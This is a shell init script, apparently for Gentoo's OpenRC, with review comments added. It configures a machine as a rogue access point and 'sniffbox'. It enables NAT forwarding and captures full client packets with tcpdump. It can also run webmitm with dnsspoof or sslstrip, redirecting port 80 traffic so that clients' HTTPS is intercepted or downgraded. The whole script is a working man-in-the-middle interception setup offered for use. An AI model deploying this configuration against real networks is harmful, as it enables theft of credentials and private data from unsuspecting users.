- #!/sbin/runscript
- # this script need a few config parameters in /etc/conf.d/$(basename $0):
- # IF_SERVER is the server interface ( the one accepting clients connections )
- # IF_CLIENT is the client interface ( the one connected to the internet )
- # ssl_handler can be webmitm or sslstrip or nothing.
- # check my post for a better explaination: http://lifeinarootshell.blogspot.it/2013/04/tf201-as-sniffbox.html
- extra_commands="clear"
# Declare the services that must be running before this one starts:
# the access point daemon and the DHCP server for the client-facing side.
depend() {
  need hostapd
  need dhcpd
}
# Reset the packet filter to an empty rule set.
#
# First every rule is flushed (-F), then every user-defined chain is deleted
# (-X), each time for the default table and then for the nat table.
# NOTE(review): this is not limited to rules created by this service; any
# rule already loaded in these two tables is removed as well, and default
# chain policies are left as they were.
flush() {
  for action in -F -X; do
    iptables "$action"
    iptables -t nat "$action"
  done
}
# Extra action "clear": delete everything matched by /var/lib/tcpdump/*.
#
# The glob does not match dot-files, so hidden entries stay in place.
# Returns the exit status of rm through eend.
clear() {
  ebegin "Clearing /var/lib/tcpdump directory"
  rm -rf /var/lib/tcpdump/*
  eend "$?"
}
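# Start the capture box.
#
# Globals read: IF_SERVER  - interface facing the clients
#               IF_CLIENT  - interface facing the upstream network
#               ssl_handler - "webmitm", "sslstrip", or anything else for
#                             plain capture
# Returns: 1 when IF_SERVER or IF_CLIENT is missing (nothing is changed in
#          that case); otherwise 0, as the function ends with einfo. The
#          status of each daemon start is only reported through eend.
start() {
  # Check the configuration before touching the firewall: with an empty
  # interface name the iptables calls below would be malformed, and flush()
  # would already have wiped the existing rule set.
  if [ -z "${IF_SERVER:-}" ] || [ -z "${IF_CLIENT:-}" ]; then
    eerror "IF_SERVER and IF_CLIENT must be set in the service's /etc/conf.d file"
    return 1
  fi

  flush

  # Enable IPv4 routing and NAT clients out through the upstream interface.
  # Return traffic is accepted only for connections the clients opened.
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A POSTROUTING -o "$IF_CLIENT" -j MASQUERADE
  iptables -A FORWARD -i "$IF_CLIENT" -o "$IF_SERVER" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
  iptables -A FORWARD -o "$IF_CLIENT" -i "$IF_SERVER" -j ACCEPT

  use_dnsspoof="no"
  case "${ssl_handler:-}" in
    webmitm)
      ebegin "Starting webmitm"
      # Runs from /etc/webmitm; presumably that directory holds the
      # certificate webmitm presents - confirm against the local setup.
      start-stop-daemon --start -b -d /etc/webmitm --exec /usr/sbin/webmitm -- -d
      eend $?
      use_dnsspoof="yes"
      ;;
    sslstrip)
      ebegin "Starting sslstrip"
      # Only TCP port 80 arriving on the client-facing interface is
      # redirected to local port 10000; connections that clients open
      # directly on other ports (443 included) are forwarded untouched.
      iptables -t nat -A PREROUTING -i "$IF_SERVER" -p tcp --destination-port 80 -j REDIRECT --to-port 10000
      start-stop-daemon -b --start -m -p /var/run/sslstrip.pid python /usr/lib/sslstrip/sslstrip.py -- -kw /dev/null
      eend $?
      ;;
    *)
      einfo "sniffing raw traffic."
      ;;
  esac

  # "=" instead of "==": the latter is not POSIX inside [ ] and fails when
  # /bin/sh is not bash.
  if [ "x$use_dnsspoof" = "xyes" ]; then
    ebegin "Starting dnsspoof"
    start-stop-daemon --start -b --exec /usr/sbin/dnsspoof -- -i "$IF_SERVER"
    eend $?
  else
    # don't waste time finding the current dns servers, use the google open one.
    # Only UDP port 53 is rewritten; DNS over TCP is not covered by this rule.
    iptables -t nat -I PREROUTING -i "$IF_SERVER" -p udp --destination-port 53 -j DNAT --to 8.8.8.8
  fi

  ebegin "Starting tcpdump"
  # -n: no name resolution, -p: no promiscuous mode, -s0: full packets,
  # -C 10: rotate the output file at roughly 10 million bytes.
  # Full-length capture means the files hold complete payloads, so the
  # output directory should be readable by the capture account only.
  # NOTE(review): the file name is relative; the message below says the
  # files end up in /var/lib/tcpdump, which presumably depends on how
  # tcpdump is built or run on this system - confirm.
  start-stop-daemon --start -b --exec /usr/sbin/tcpdump -- -nps0 -i "$IF_SERVER" -w "$(date +%d-%m-%Y_%H-%M).cap" -C 10
  eend $?
  einfo sniff files will be in /var/lib/tcpdump folder
}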
# Stop the capture box: empty the firewall tables, switch IPv4 forwarding
# off, stop whichever helper matches ssl_handler, then stop tcpdump.
#
# NOTE(review): forwarding is set to 0 unconditionally, whatever its value
# was before start() ran.
# Returns the status of the tcpdump stop, via the final eend.
stop() {
  flush
  echo 0 > /proc/sys/net/ipv4/ip_forward

  if [ "$ssl_handler" = "webmitm" ]; then
    # webmitm is always paired with dnsspoof in start(), so both go down.
    ebegin "Stopping webmitm"
    start-stop-daemon --stop --exec /usr/sbin/webmitm
    eend "$?"
    ebegin "Stopping dnsspoof"
    start-stop-daemon --stop --exec /usr/sbin/dnsspoof
    eend "$?"
  elif [ "$ssl_handler" = "sslstrip" ]; then
    # sslstrip runs under the python interpreter, so it is located through
    # the pid file written at start instead of its executable path.
    ebegin "Stopping sslstrip"
    start-stop-daemon --stop -p /var/run/sslstrip.pid
    eend "$?"
  fi

  ebegin "Stopping tcpdump"
  start-stop-daemon --stop --exec /usr/sbin/tcpdump
  eend "$?"
}